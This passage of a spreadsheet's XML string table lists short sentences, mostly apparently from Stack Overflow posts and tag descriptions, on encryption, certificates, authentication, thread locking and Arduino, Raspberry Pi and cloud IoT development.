But you use const char* for secret.</t>
  </si>
  <si>
    <t>If GetFilesAsync does not also use .ConfigureAwait(false) you could still deadlock.</t>
  </si>
  <si>
    <t>As @DominicBetts said, you don't need to create the SAS token when using the IoTHub SDK for Java.</t>
  </si>
  <si>
    <t>I assume something must've become corrupt or something.</t>
  </si>
  <si>
    <t>Even i got the same  So I first paired my HC-05 with the PC(windows), coz my HC-05 is password locked.</t>
  </si>
  <si>
    <t>You can programmatically register devices using bulk/devices operations.</t>
  </si>
  <si>
    <t>You can use it like this (plus some non-blocking checks perhaps):</t>
  </si>
  <si>
    <t>Try to reset the file permissions (I assume the DocumentRoot is set to /var/www):</t>
  </si>
  <si>
    <t>Since the data is encrypted, suppose that you are using LoRaWAN.</t>
  </si>
  <si>
    <t>IS the password actually 3 or 4 characters long?</t>
  </si>
  <si>
    <t>Try changing your onReceive signature to:</t>
  </si>
  <si>
    <t>Google Firebase Database Secrets are deprecated right now.</t>
  </si>
  <si>
    <t>Take device1 for example, it has the primary key: key1 and secondary key: key2.</t>
  </si>
  <si>
    <t>I created a new keystore (exemple.com.jks) with signed certificate
3.</t>
  </si>
  <si>
    <t>If FPort = [1..255], the AppSKey key will be used to encrypt your payload.</t>
  </si>
  <si>
    <t>if you have an RSA key, make sure it's RSA and not RSA with the x509 specified in the registry.</t>
  </si>
  <si>
    <t>For me, the problem was an instance of SoftwareSerial with invalid pin numbers.</t>
  </si>
  <si>
    <t>defining : 
 and 
target_link_libraries(${PROJECT_NAME}_class ${wiringPi_LIB}  -lcrypt -lrt)
in CMakeLists.txt did the trick for me</t>
  </si>
  <si>
    <t>If your cert is signed by a server with a well known CA then you can use CA method.</t>
  </si>
  <si>
    <t>HID scan codes are always 8 bit.</t>
  </si>
  <si>
    <t>Bluetooth signal is digitalized via FSK and LoRa is CHIRP which makes them different by nature also.</t>
  </si>
  <si>
    <t>It's set to root when it should be lock.</t>
  </si>
  <si>
    <t>SHA-3 is a family of cryptographic hash functions, a successor to SHA-2.</t>
  </si>
  <si>
    <t>The pgcrypto module provides cryptographic functions for PostgreSQL.</t>
  </si>
  <si>
    <t>Geiser is an Emacs environment to hack and have fun in Scheme</t>
  </si>
  <si>
    <t>Data corruption and integrity issues</t>
  </si>
  <si>
    <t>JNCryptor is a Java library that simplifies encrypting data with AES.</t>
  </si>
  <si>
    <t>Keys can be specified either by the ASCII character they represent or by their keycode.</t>
  </si>
  <si>
    <t>js-nacl - Emscripten-compiled Javascript version of NaCl, the Networking and Cryptography library.</t>
  </si>
  <si>
    <t>The Android system tool for Optimizing and Verifying applications</t>
  </si>
  <si>
    <t>when the hash codes are unique.</t>
  </si>
  <si>
    <t>Ketama is a library and logic for consistent hashing.</t>
  </si>
  <si>
    <t>The dod is the Department of Defense which serves to provide military strength and security to the United States.</t>
  </si>
  <si>
    <t>A second, private key is kept secret, so that only you know it.</t>
  </si>
  <si>
    <t>Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority.</t>
  </si>
  <si>
    <t>X11 forwarding has some security implications.</t>
  </si>
  <si>
    <t>Clear means any transmission or data which is not encrypted.</t>
  </si>
  <si>
    <t>Geiser is an Emacs environment to hack and have fun in Scheme.</t>
  </si>
  <si>
    <t>To access encrypted data, user has to provide a valid used password.</t>
  </si>
  <si>
    <t>The metering messages are signed and non-repudiable.</t>
  </si>
  <si>
    <t>No secret array indices.</t>
  </si>
  <si>
    <t>Theyre not locked in just because theyve been committed to
  your VCS.</t>
  </si>
  <si>
    <t>@cleartext
Is a variable of type nvarchar, char, varchar, binary, varbinary, or nchar that contains data that is to be encrypted with the key.</t>
  </si>
  <si>
    <t>Irreversibility means that the original data cannot be reconstructed from its hash.</t>
  </si>
  <si>
    <t>Documentation:
https://developer.android.com/reference/java/net/Authenticator</t>
  </si>
  <si>
    <t>Eazfuscator.NET can even virtualize and optimize your code and do a lot in between.</t>
  </si>
  <si>
    <t>cryptographichash alone still discloses that the two passwords are the same (as they would have the same hash value).</t>
  </si>
  <si>
    <t>This alone should be enough to disqualify password encryption from use almost anywhere.</t>
  </si>
  <si>
    <t>Stored avatar can be accessed through URL containing MD5 hash of user's e-mail.</t>
  </si>
  <si>
    <t>PlayReady is a generic DRM solution from Microsoft for protecting any kind of files.</t>
  </si>
  <si>
    <t>I have the following Makefile (If you are asking me why there's \" included you can refer to my previous question)
and code:
when I compile this with make USERNAME=hello PASSWORD=world, everything works and I see 'hello:world' being printed out.</t>
  </si>
  <si>
    <t>Instead I get Login is not defined error in my browser.</t>
  </si>
  <si>
    <t>Because client ids have to be unique else they will cause a reconnection storm</t>
  </si>
  <si>
    <t>I know nothing about Arduino - but more about 802.11 aka Wi-Fi.</t>
  </si>
  <si>
    <t>It was kind of a proxy problem, php didn't used the defined proxys.</t>
  </si>
  <si>
    <t>As with os.system this can have security implications!</t>
  </si>
  <si>
    <t>What you seem to be looking to do is mutual authentication.</t>
  </si>
  <si>
    <t>For example, Google, Facebook, and Microsoft Exchange each have their own authenticator.</t>
  </si>
  <si>
    <t>JWS applications have three security levels.</t>
  </si>
  <si>
    <t>Are 6 MB/s encryption speed reasonable on a Raspberry?</t>
  </si>
  <si>
    <t>Do we need to exclude or lock something ?</t>
  </si>
  <si>
    <t>They share a bus connection and ground and your ardunio can interrogate the bus.</t>
  </si>
  <si>
    <t>It contains EAN Codes, ISBN Numbers and many more codes.</t>
  </si>
  <si>
    <t>We can use === and !== to tell the interpreter to not coerce before comparing.</t>
  </si>
  <si>
    <t>I am trying to run the following example code using my NetBeans IDE:
From an excellent tutorial:
DBUS TUTORIAL USING THE LOW-LEVEL API
I have my headless Pi setup for SSH and have installed all the necessary libraries for dbus development.</t>
  </si>
  <si>
    <t>To make unique session and message keys the shared secret is usually combined with an initialization vector (IV).</t>
  </si>
  <si>
    <t>Cannot Implicitly convert type "String" to "Windows.Security.Credentials.PasswordCredential"
 After about 4 hours of searching I cannot figure out this error.</t>
  </si>
  <si>
    <t>PHP_CodeSniffer is a PHP PEAR package that can be used to tokenise PHP, JavaScript and CSS files and to detect violations of a defined set of coding standards.</t>
  </si>
  <si>
    <t>PHP_CodeSniffer tokenises PHP, JavaScript and CSS files and detects violations of a defined set of coding standards.</t>
  </si>
  <si>
    <t>I am currently generating a unique ID with a check digit at the end (using the same approach as UPC codes).</t>
  </si>
  <si>
    <t>Canny also produced a computational theory of edge detection explaining why the technique works.</t>
  </si>
  <si>
    <t>A certificate which uses a digital signature to bind together a public key with an identity or information.</t>
  </si>
  <si>
    <t>However I need to receive multiple bits of data to verify the information.</t>
  </si>
  <si>
    <t>What im really struggling with is how to in code generate the signature used in the password field.</t>
  </si>
  <si>
    <t>I'm currently doing the following:
But it seems like the author of the PubSubClient library has changed the signature.</t>
  </si>
  <si>
    <t>I have configured the WebDAV correctly and give applied it Digest Authentication.</t>
  </si>
  <si>
    <t>Below demonstrates this along with making the attribute public and directly accessing it.</t>
  </si>
  <si>
    <t>I got my await SpiDevice.FromIdAsync(devs[0].Id, set) locked, and when I changed to devTask.Wait(), lock disappeared and device found from devTask.Result.</t>
  </si>
  <si>
    <t>SPKAC is an acronym that stands for Signed Public Key and Challenge.</t>
  </si>
  <si>
    <t>The project uses some encryption code that exists in the library folder.</t>
  </si>
  <si>
    <t>I need my device to get access request and then decide to allow or deny access to that client, depending on other details.</t>
  </si>
  <si>
    <t>And I unregister the receiver when the activity is destroyed.</t>
  </si>
  <si>
    <t>Check your AWS Secret Access Key and signing
  method.</t>
  </si>
  <si>
    <t>The matrix inverse, A^{-1}, is a mathematical relationship such that given a square n x n matrix A, A*A^{-1} = A^{-1}*A = I, where I is the identity matrix.</t>
  </si>
  <si>
    <t>It consist of settings that affect the security of a Windows system.</t>
  </si>
  <si>
    <t>Read more about our API here and sign up for a free Public Key.</t>
  </si>
  <si>
    <t>OAuth is also distinct from OATH, which is a reference architecture for authentication, not a standard.</t>
  </si>
  <si>
    <t>MuleSoft produces the Anypoint Platform, which consists of:
Anypoint Exchange
Anypoint Security
Anypoint Analytics
Anypoint Studio
Mule runtime engine
etc.</t>
  </si>
  <si>
    <t>So, passphrase = a string consisting only of 32 to 126 (decimal) ASCII code.</t>
  </si>
  <si>
    <t>Edge Hub does not really care who is calling into it as long as the right credentials are provided.</t>
  </si>
  <si>
    <t>The lock release and then I can turn it off.</t>
  </si>
  <si>
    <t>I assume this is either related to my file permissions, PATH or CLASSPATH.</t>
  </si>
  <si>
    <t>I have an API Token from Riot Games and its limited to 10 Requests per second.</t>
  </si>
  <si>
    <t>As far as I can tell, actually moving the cursor with JS won't be possible (for largely obviously security reasons).</t>
  </si>
  <si>
    <t>On a Linux system running Lighttpd, how can I automate certificate renewal for Lets Encrypt certs.</t>
  </si>
  <si>
    <t>This is not a duplicate of the other questions (or at least the ones I came across) because I don't use SSL/HTTPS anywhere in my code.</t>
  </si>
  <si>
    <t>I do not want the private key to be in memory (RAM).</t>
  </si>
  <si>
    <t>I am doing the steps described by AWS to use a self-signed certificate.</t>
  </si>
  <si>
    <t>I'm having trouble with my code for a digital code lock project.</t>
  </si>
  <si>
    <t>): SendFailure ---&gt; System.IO.IOException: The authentication or decryption has failed.</t>
  </si>
  <si>
    <t>I have also developed an android app that control's these houses, each User can login using his phone number and control his house.</t>
  </si>
  <si>
    <t>I've been trying to connect to IoT MQTT in a web browser, so I'm generating a signed URL and connecting with Paho.</t>
  </si>
  <si>
    <t>Is it different than the one which is associated with the registry level certificate?</t>
  </si>
  <si>
    <t>I am trying to connect with the AWS iot endpoint by providing the access key id, secret key and session token.</t>
  </si>
  <si>
    <t>chmod +s myExectuable
However, this has terrible security implications as the process then runs as root - with all the hazards that entails.</t>
  </si>
  <si>
    <t>Your only secret key to be worried about would then be protected the server itself (don't share this with your pi's).</t>
  </si>
  <si>
    <t>(You can download an app called Fing to see what kind of information you can get via network scan)</t>
  </si>
  <si>
    <t>Maybe you haven't replaced all the @ or maybe you are using @arduino elsewhere and it's not thread safe.</t>
  </si>
  <si>
    <t>Let's Encrypt installation process does some magic I don't know anything about.</t>
  </si>
  <si>
    <t>For a 12km long wire, you have to have very serious overvoltage protection, too.</t>
  </si>
  <si>
    <t>But since void setAccScale(A_scale accScale) is already private, there is no scenario when A_scale need to be used publicly.</t>
  </si>
  <si>
    <t>C preprocessor macros are based on token substitution, not evaluation.</t>
  </si>
  <si>
    <t>OpenSSL also documents the SIGILL behavior in their FAQ.</t>
  </si>
  <si>
    <t>There are more sophisticated algorithms if you Google around.</t>
  </si>
  <si>
    <t>This is most likely a failure to negotiate a cipher to use.</t>
  </si>
  <si>
    <t>For the data encryption you can refer to this article.</t>
  </si>
  <si>
    <t>What you're trying to do is not valid html, so the browser kicks the invalid tags out of the table.</t>
  </si>
  <si>
    <t>The  method must be thread-safe, i.e.</t>
  </si>
  <si>
    <t>It sounds like you have a registry level certificate specified.</t>
  </si>
  <si>
    <t>You will need locks to protect shared data.</t>
  </si>
  <si>
    <t>You can also can have try catch, and on error just do second trip to get by id since you know that record is inserted.</t>
  </si>
  <si>
    <t>It does seem that such spurious locks are being cleaned out after a while; usually they're gone the next day.</t>
  </si>
  <si>
    <t>FileVault is a method of using encryption with volumes on Mac computers.</t>
  </si>
  <si>
    <t>CRYPTOGRAPHY MUST BE PROGRAMMING RELATED.</t>
  </si>
  <si>
    <t>Questions about self-signed SSL certificates, e.g.</t>
  </si>
  <si>
    <t>ORA-01722: invalid number in Oracle.</t>
  </si>
  <si>
    <t>HMAC SHA-1 stands for Hashed Message Authentication Code using Sercure Hash Algorithm 1.</t>
  </si>
  <si>
    <t>It removes obsolete data without violating integrity.</t>
  </si>
  <si>
    <t>However, there is little to no risk in the file being world readable.</t>
  </si>
  <si>
    <t>The authentication configuration file is located at , which contains several well documented options for tweaking the behavior of the authentication facilities.</t>
  </si>
  <si>
    <t>Consistent hashing is used in many places.</t>
  </si>
  <si>
    <t>HTTP basic authentication is provided by mod_auth_basic, and HTTP digest authentication is provided by mod_auth_digest.</t>
  </si>
  <si>
    <t>Java Applet &amp; Web StartCode Signing and the related security prompts.</t>
  </si>
  <si>
    <t>Motor presents a coroutine-based API for non-blocking access to MongoDB from Tornado or asyncio.</t>
  </si>
  <si>
    <t>), compiled, signed and delivered directly to the device.</t>
  </si>
  <si>
    <t>The problem is that the encrypted data sent from PHP, do not coincide in the Arduino.</t>
  </si>
  <si>
    <t>A byte should be unsigned on both arduino and C#, so I'm not sure what is going wrong.</t>
  </si>
  <si>
    <t>Its supposed to be able to open a electromachanical lock for 5secs.</t>
  </si>
  <si>
    <t>I can no longer see it in my network but is still accessible through SSH.</t>
  </si>
  <si>
    <t>How would the number not be stolen during the request?</t>
  </si>
  <si>
    <t>I need to use this approach to be able to substitute DLLs during runtime, without having a lock on the DLLs and without disrupting running services.</t>
  </si>
  <si>
    <t>And I noticed I can connect a device to IoT hub using either Primary key or Secondary key.</t>
  </si>
  <si>
    <t>Update Error message on IoT-Core RPi ARM
The operation identifier is not valid.</t>
  </si>
  <si>
    <t>I am aware of various libraries such as IRremote but they do not have the functionality that I need.</t>
  </si>
  <si>
    <t>I'm trying to use arduino IDE for the board arduino galileo gen2 but I'm getting this error:
package_index.json file signature verification failed.</t>
  </si>
  <si>
    <t>Whenever I try to execute the followin command, I get the SQLite Error 5: Database is locked!</t>
  </si>
  <si>
    <t>This will probably get tagged as a duplicate, but I haven't had any luck, so here we go.</t>
  </si>
  <si>
    <t>If you put the key on the lock the ID of that key is "typed".</t>
  </si>
  <si>
    <t>This prevent me from searching the services and such because a 'connected' state isn't achieved
Here is a code snip...</t>
  </si>
  <si>
    <t>I can receive diffent codes depending on which keys on the remote i am pressing.</t>
  </si>
  <si>
    <t>I only ask how can I prevent this anonymous random key to be there and how can I replace it with other key?</t>
  </si>
  <si>
    <t>The communication is in HTTP because I do not have a signed certificate.</t>
  </si>
  <si>
    <t>server is defined here as a protected method.</t>
  </si>
  <si>
    <t>), with digital pins flaw or both?</t>
  </si>
  <si>
    <t>I'm trying to create a door lock using the raspberry pi that interfaces a 4x4 matrix keypad and an I2C lcd display.</t>
  </si>
  <si>
    <t>[date time, 804] [Iot - Core] WARN - FileSystemPreferences Could not lock System prefs.</t>
  </si>
  <si>
    <t>Luckily, these security measures will be acceptable for most of our users, but it isn't most users that concern me.</t>
  </si>
  <si>
    <t>(Using the const char* format below)(The reason I exclude them is for security(right?))</t>
  </si>
  <si>
    <t>But, one more devices are connected to a gateway by 6lowpan, the communication is blocked.</t>
  </si>
  <si>
    <t>After upgrading to the new DP6, the login works but the UI responds very very slow.</t>
  </si>
  <si>
    <t>MariaDB [(none)]&gt;
I have gone through other examples of how to reset the password (--skip-grant-tables and such)  with no luck.</t>
  </si>
  <si>
    <t>My thoughts were to use AWS Cognito to authenticate users and limiting access to particular devices (topics) owned by that user via IAM roles.</t>
  </si>
  <si>
    <t>The same scenario when both the RFID and PIN Code matches with the database.</t>
  </si>
  <si>
    <t>The server sends a clear text response (JSON) where the command field is an encrypted text.</t>
  </si>
  <si>
    <t>The pin numbers are still correct when being ran from PHP.</t>
  </si>
  <si>
    <t>The problem is that this invalidates the packet.</t>
  </si>
  <si>
    <t>I have a suspicion that Azure might be blocking the connection from the Arduino.?</t>
  </si>
  <si>
    <t>if((*data&amp;bit_mask)&gt;(bit_mask-1) &amp;&amp; (*data&amp;bit_mask)&lt;(bit_mask+1 )){
    PORTA ^= (1&lt;&lt;PORTA2);
    return 1
As i can see it is a problem with AND '&amp;' operation.</t>
  </si>
  <si>
    <t>Now i have join it with arduino based door lock.</t>
  </si>
  <si>
    <t>Now to my specific problem:
I want to use counter mode in my encryption.</t>
  </si>
  <si>
    <t>I can see that I currently get several duplicate messages, triggering my lambdas twice, causing noise and invalid data as a consequence.</t>
  </si>
  <si>
    <t>I've been trying to decode my  raw data but always getting unknown code.</t>
  </si>
  <si>
    <t>Example:
When I encrypt "HELLO WORLD" on my esp32 with the key "ENCRYPTION KEY" I get this: 
35bd3126715874f741518f4d
And when I decrypt it on PHP it returns blank.</t>
  </si>
  <si>
    <t>Is it possible to connect to MQTT over websockets via the AWS IoT Device SDK for Python without a CA certificate, using AWS Access Key ID and AWS Secret Access Key instead?</t>
  </si>
  <si>
    <t>This is my sketch code:
And this is the output I get:
As you can see above, the decryption is not working correctly.</t>
  </si>
  <si>
    <t>I'm working in an organization that blocks outbound NTP connections for security reasons.</t>
  </si>
  <si>
    <t>An I changed the MAC addresses for confidentiality.)</t>
  </si>
  <si>
    <t>I have also tried adding its own .htaccess and .htpasswd file in the "limited" folder with a different user.</t>
  </si>
  <si>
    <t>This works fine but if I run my Python script it continuously asks for the Password to the other server.</t>
  </si>
  <si>
    <t>I have an API that provides weather condition (for example), I am hosting this API on AWS Lambda and securing it using AWS Cognito.</t>
  </si>
  <si>
    <t>I have an Nginx reverse proxy with a self-signed certificate setup.</t>
  </si>
  <si>
    <t>So I have been trying to install a signed version and have failed so far.</t>
  </si>
  <si>
    <t>What I have is this only :
Would anybody have an idea how I can create my certificates which will be signed by my CA certificate?</t>
  </si>
  <si>
    <t>I am currently working on parsing pcap files that i have captured and decrypted with aircrack-ng.</t>
  </si>
  <si>
    <t>Reason: Our rootCA is locked and no sub-certs should be issued.</t>
  </si>
  <si>
    <t>I wonder what is difference of these usage of Lock() in multiprocessing.</t>
  </si>
  <si>
    <t>So i have been trying to encrypt some of my most essential folders.</t>
  </si>
  <si>
    <t>There is also a meta-intel-iot-security/meta-integrity layer but its not maintained.</t>
  </si>
  <si>
    <t>Driver Signature Enforcement Overrider
  See the instruction in /vista64/Readme64.txt.</t>
  </si>
  <si>
    <t>The string of data consists of some letters for identifiers and two values.</t>
  </si>
  <si>
    <t>And yes, spoofing is trivial if you can replace the device driver.</t>
  </si>
  <si>
    <t>They have a shell script that you can run called  that changes the permissions of /var/lock/.</t>
  </si>
  <si>
    <t>However, I still don't see any guarantees documented there, so this is not reliable.</t>
  </si>
  <si>
    <t>Ultimately it depends on who needs to be authenticated.</t>
  </si>
  <si>
    <t>Not only this, you should check if the copy operation before this error was valid.</t>
  </si>
  <si>
    <t>Yes, assuming that the device is HID compliant.</t>
  </si>
  <si>
    <t>The Yn can connect to unencrypted networks, as well as networks that support WEP, WPA, and WPA2 encryption.</t>
  </si>
  <si>
    <t>You indicate that you are currently unlocking upon detection of just any tag.</t>
  </si>
  <si>
    <t>Access your device using adb:
root@user:/$ adb shell
shell@android:/$:  
Identifying your device:
So you see /proc/asound/pcm will give you a long list.</t>
  </si>
  <si>
    <t>A pair of key is supposed to represent an identity, i.e.</t>
  </si>
  <si>
    <t>If you need a encrypted solution, you may use TLS or SSL over FTP.</t>
  </si>
  <si>
    <t xml:space="preserve">
Cron scripts defined in , /etc/cron.d or via
crontab -e may run as a user other than root.</t>
  </si>
  <si>
    <t>And, normally, during encryption, the frame counter and the data payload must be used in big endian.</t>
  </si>
  <si>
    <t>Membership in the network is enough to ensure authenticity/security.</t>
  </si>
  <si>
    <t>Perhaps it should at least be
or something, to at least lock the 1 to the active part.</t>
  </si>
  <si>
    <t>2345: NotificationUID
      A 32-bit numerical value that is the unique identifier (UID) for the iOS notification.</t>
  </si>
  <si>
    <t>Since, I don't know how you have your LED wired, I didn't want to assume how that would be done.</t>
  </si>
  <si>
    <t>What you have done is to enable User level access of the counter.</t>
  </si>
  <si>
    <t>Not sure what happens if you don't do it, but you might lock it for other processes.</t>
  </si>
  <si>
    <t>CBC doesn't provide authentication, so that alone should make GCM measurably slower (though perhaps not the factor of 4 you're seeing).</t>
  </si>
  <si>
    <t>Create a bit mask, and boolean AND it with your port:
https://www.arduino.cc/en/Tutorial/BitMask
btw.</t>
  </si>
  <si>
    <t>Double checkCOM3 is also listed in device manager menu of windows.</t>
  </si>
  <si>
    <t>Certainly leading to an invalid array access.</t>
  </si>
  <si>
    <t>Moreover you need a way to reset the position and start a new password: since you didn't use the # char I used it.</t>
  </si>
  <si>
    <t>This isn't appropriate for a fancy computer because it is not re-entrant and thus not thread safe.</t>
  </si>
  <si>
    <t>tkinter is not thread-safe (by default).</t>
  </si>
  <si>
    <t>The  handler is called from ISR handler and therefore all other ISRs are blocked.</t>
  </si>
  <si>
    <t>OK, looks like you have some thread-safety problem.</t>
  </si>
  <si>
    <t>Authorization is a bit more complex.</t>
  </si>
  <si>
    <t>Always check first the values on both wires (using scope or dvm), if '0' it means bus locked.</t>
  </si>
  <si>
    <t>That isn't safe when pointers are 64 bit.</t>
  </si>
  <si>
    <t>According to blog by Erfinden
Steps :
Insert sim and lock it.</t>
  </si>
  <si>
    <t>If you want to generate your own codes, you will also need to compute and transmit the correct checksum.</t>
  </si>
  <si>
    <t>If you use long unshielded wires, then the connection may be unstable.</t>
  </si>
  <si>
    <t>Please be aware that this is mostly speculation
I just wonder if there is an issue with mac addresses?</t>
  </si>
  <si>
    <t>The second byte stores the pin position using a bitmask.</t>
  </si>
  <si>
    <t>by RF), AppData is sent but it's encrypted and encapsulated before.</t>
  </si>
  <si>
    <t>PyMongo is thread safe but not Fork safe.</t>
  </si>
  <si>
    <t>I also just kept the 2 files for .htpasswd and .htaccess in the "limited" folder.</t>
  </si>
  <si>
    <t>return ERR_INVALID_LENGTH;
     }
    $data=XTEA::decrypt($data,$key,32);
    $checksum=substr($data,0,4);
    $data=substr($data,4);
    if(hash('adler32be',$data)!=$checksum){
        // checksum fail, can't be an xtea-encrypted command (or maybe it was corrupted or tampered with?)</t>
  </si>
  <si>
    <t>And because it uses libbrcmGLESv2.so, you are guaranteed the same (maybe bugged) code won't be executed.</t>
  </si>
  <si>
    <t>As long as you are inside your network you can use the internal IP adress tho.</t>
  </si>
  <si>
    <t>If the output is as shown below, it means bluetooth is blocked.</t>
  </si>
  <si>
    <t>Double-check the scop and endorsement key in DPS.</t>
  </si>
  <si>
    <t>I was part of neither the lock nor dialout groups.</t>
  </si>
  <si>
    <t>Since it also doesn't work for me I think Apple blocked serial access on iOS5+.</t>
  </si>
  <si>
    <t>Represents text that should be kept confidential.</t>
  </si>
  <si>
    <t>By default, a StreamReader is not thread safe.</t>
  </si>
  <si>
    <t>They can not be modify because of the lack of user privileges.</t>
  </si>
  <si>
    <t>A unique identifying number in any iOS device.</t>
  </si>
  <si>
    <t>Toolkit for safe and simple cryptography in Java, Python, C++, C# and Go</t>
  </si>
  <si>
    <t>crypt() is Unix C library function used for hashing passwords.</t>
  </si>
  <si>
    <t>ThreadSanitizer (TSan) is a data race detector for C/C++ programs.</t>
  </si>
  <si>
    <t>The authentication configuration file is located at app/config/auth.php, which contains several well documented options for tweaking the behavior of the authentication facilities.</t>
  </si>
  <si>
    <t>Topaz electronic signature capture devices</t>
  </si>
  <si>
    <t>The concept of locking a file to serialize concurrent accesses to said file.</t>
  </si>
  <si>
    <t>In cryptography, a certificate authority or certification authority (CA) is an entity that issues digital certificates.</t>
  </si>
  <si>
    <t>Applications include error correcting codes and cryptography.</t>
  </si>
  <si>
    <t>CryptSharp is .net libraray which provides a number of password crypt algorithms</t>
  </si>
  <si>
    <t>Physical Security Interoperability Alliance is a global consortium of physical security manufacturers and integrators focused on promoting interoperability of IP-enabled security devices.</t>
  </si>
  <si>
    <t>An implementation of the Redlock distributed lock algorithm</t>
  </si>
  <si>
    <t>ORCID provides a persistent digital identifier that distinguishes you from every other researcher</t>
  </si>
  <si>
    <t>They are scalable, replicated and provide strong ACID guarantees.</t>
  </si>
  <si>
    <t>Zcash is a cryptocurrency which provides enhanced user privacy by using cryptography.</t>
  </si>
  <si>
    <t>This model separates the application from the authentication mechanism.</t>
  </si>
  <si>
    <t>The standard, issued in 1981, only offers confidentiality.</t>
  </si>
  <si>
    <t>JDKs provide a utility named keytool to manipulate the keystore and the cryptographic assets that it contains.</t>
  </si>
  <si>
    <t>Trust is often established and propagated through cryptography.</t>
  </si>
  <si>
    <t>Attempting either of these operations will cause an IllegalStateException to be thrown.</t>
  </si>
  <si>
    <t>A  is a token one application gives to a second application to allow the second to execute operations using the permissions of the first.</t>
  </si>
  <si>
    <t>Creating encrypted PDF files.</t>
  </si>
  <si>
    <t>The primary key must not be null and must contain only unique values.</t>
  </si>
  <si>
    <t>For both strategies, data is decrypted on the database server at runtime.</t>
  </si>
  <si>
    <t>During simulations and verifications SPIN checks for the absence of deadlocks, unspecified receptions, and unexecutable code.</t>
  </si>
  <si>
    <t>FoundationDB's durability is the strongestall transactions are redundantly stored to disk before they are considered committed.</t>
  </si>
  <si>
    <t>Code signing is a security technology that allows you to certify that an application was created by you.</t>
  </si>
  <si>
    <t>ProGuard config must be tweaked to keep the appropriate classes for whatever crypto algorithms you need.</t>
  </si>
  <si>
    <t>Many of the features in InstallShield are locked and unavailable.</t>
  </si>
  <si>
    <t>Pathauto depends on the Token module.</t>
  </si>
  <si>
    <t>This will give you a Client Key and Secret Key.</t>
  </si>
  <si>
    <t>&lt;input type="password"&gt; defines a password field.</t>
  </si>
  <si>
    <t>ZeroVM allows for secure computation even with untrusted code.</t>
  </si>
  <si>
    <t>iOS Login can use a number of different methods to request permissions.</t>
  </si>
  <si>
    <t>Thread-safe by design.</t>
  </si>
  <si>
    <t>Getting an API key
Sign-up here to get your key and start building.</t>
  </si>
  <si>
    <t>Javascript/HTML 5 adapter for pure Javascript apps
Session management from admin console
Revocation policies
Password policies
OpenID Connect Support
SAML 2.0 support</t>
  </si>
  <si>
    <t>A sample NVP (minus the necessary authentication data) looks like this
Responses are made in kind.</t>
  </si>
  <si>
    <t>In addition, the encryption and decryption usually must be done on the same computer.</t>
  </si>
  <si>
    <t>MIFARE Classic encryption has been compromised; see below for details.</t>
  </si>
  <si>
    <t>Google Sign-In increases conversions by reducing the burden and friction of login.</t>
  </si>
  <si>
    <t>If you don't want your program to be killed, handle or block SIGPIPE yourself.</t>
  </si>
  <si>
    <t>Encrypted connections use Transport Layer Security (TLS).</t>
  </si>
  <si>
    <t>Achieve cyber-autonomy in the comfort of your own home, using Mechanical Phish, the third-place winner of the DARPA Cyber Grand Challenge.</t>
  </si>
  <si>
    <t>XML columns can be associated with XSD schemas; XML data being stored is verified against the schema.</t>
  </si>
  <si>
    <t>A comparison of features between Tampermonkey, Chrome, and other platforms.</t>
  </si>
  <si>
    <t>Probabilities are calculated using the XML schema the document can be validated against.</t>
  </si>
  <si>
    <t>SMP and thread-safe design.</t>
  </si>
  <si>
    <t>Properties named ID or [ClassName]ID will be created as a primary key.</t>
  </si>
  <si>
    <t>This means that all data sent over the network needs to be encrypted encase it is  intercepted during the transfer.</t>
  </si>
  <si>
    <t>OpenCV was originally developed by Intel and now supported by Willow Garage.</t>
  </si>
  <si>
    <t>mod_ssl is a module for the Apache HTTPD webserver which allows it to perform SSL and TLS encryption on connections.</t>
  </si>
  <si>
    <t>Because of the lack of security of this approach, it's now usually used along a SSL connection.</t>
  </si>
  <si>
    <t>Usually assigned a surrogate primary key.</t>
  </si>
  <si>
    <t>Examples of Drupal modules are Views, Token, CCK, and Pathauto.</t>
  </si>
  <si>
    <t>Just as with adjacency lists, referential integrity is preserved.</t>
  </si>
  <si>
    <t>Having the privilege to insta-close duplicates is tempting.</t>
  </si>
  <si>
    <t>Condemnation of MD5-based password salting.</t>
  </si>
  <si>
    <t>Consistency is not necessarily guaranteed.</t>
  </si>
  <si>
    <t>Exporting Vault secrets as PropertySource through @VaultPropertySource.</t>
  </si>
  <si>
    <t>Decentralized consensus can therefore be achieved with a blockchain.</t>
  </si>
  <si>
    <t>I want to ssh the raspberry pi similarly.</t>
  </si>
  <si>
    <t>The International Obfuscated C Code Contest.</t>
  </si>
  <si>
    <t>See also: obfuscating.</t>
  </si>
  <si>
    <t>If there's places you can't see it from, it's probably a firewall issue, either on your box or on a switch in front of your box.</t>
  </si>
  <si>
    <t>I have been trying to decode Infrared Protocol used in a set-top-box.I have tried comparing with standard protocols but it doesn't match.</t>
  </si>
  <si>
    <t>I have written a simple method, which should generate a 5 digit passcode, only with the digits: 1, 2, 3, 4 (for example: 42132)
In order to do that, I am using an ESP32 with 4 PushButtons.</t>
  </si>
  <si>
    <t>It's interesting if to make double encoding in NodeMCU:
print(crypto.toBase64(b64enc))
the result will look like in PHP:   MnE3aGZnYWpkQ2g2SWE1UzdZcFl3dz09   , but all the same different.</t>
  </si>
  <si>
    <t>A list    consisting of the string "spam" and the number
  42 would be encoded    as: l4:spami42ee.</t>
  </si>
  <si>
    <t>For my application, I will ultimately be collecting points about every 100ms (or better, if I can manage it), and I need 99.5%+ data integrity.</t>
  </si>
  <si>
    <t>However, both libraries seem to lock access to the microphone when each of their respective instances are created.</t>
  </si>
  <si>
    <t>Basically, it just encrypts, using gpg, the tracked files with the public keys of all the users that you trust.</t>
  </si>
  <si>
    <t>All of the devices will have some device-specific data (a location ID and device ID, in combination unique across the entire network of devices) burnt into EEPROM.</t>
  </si>
  <si>
    <t>There's no possibility to accept every certificate at the moment (using library's methods).</t>
  </si>
  <si>
    <t>I struggle to properly release the  locked with SoftwareBitmap.LockBuffer() method in C++/CX code on UWP.</t>
  </si>
  <si>
    <t>The flow should be something like, whenever someone logs into pi, there should be some kind of key that needs to be input to get access to code.</t>
  </si>
  <si>
    <t>That's why we need to reinterpret it, so the compiler knows that we're taking responsibility for the safety of the operation.</t>
  </si>
  <si>
    <t>https://cloud.google.com/storage/docs/access-control/signed-urls</t>
  </si>
  <si>
    <t>For simplicity, remove the base64 part and just try to encrypt and decrypt: 
You then want to encode  to base64, and decode back to cipher, in between AES encrypt/decrypt</t>
  </si>
  <si>
    <t>Signing Key certificates will be inside the SIM card with no way to export the text contents.</t>
  </si>
  <si>
    <t>ISO/IEC 19794-2:2011 specifies a concept and data formats for representation of fingerprints using the fundamental notion of minutiae.</t>
  </si>
  <si>
    <t>An identity object represents the user on whose behalf the code is running.</t>
  </si>
